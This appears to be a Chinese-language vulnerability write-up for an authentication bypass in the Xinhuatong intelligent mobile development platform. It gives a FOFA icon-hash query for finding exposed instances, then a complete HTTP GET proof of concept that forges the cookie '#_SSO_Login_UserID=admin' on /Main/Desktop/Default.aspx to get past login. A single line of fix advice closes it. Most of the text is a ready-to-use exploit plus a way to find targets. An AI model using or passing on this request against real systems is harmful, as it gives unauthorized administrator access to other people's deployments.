0x01 漏洞描述:
新华通智能移动开发平台/Main/Desktop/Default.aspx中存在权限绕过,请求中构造特殊cookie可绕过登录限制。
0x02 搜索语句:
FOFA:icon_hash="513304261"
0x03 漏洞复现:
访问特定接口
/Main/Desktop/Default.aspx
在cookie中加入
#_SSO_Login_UserID=admin
完整poc如下
GET /Main/Desktop/Default.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Cookie:#_SSO_Login_UserID=admin
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
实现绕过
0x04 修复建议:
关闭互联网访问权限并限制接口访问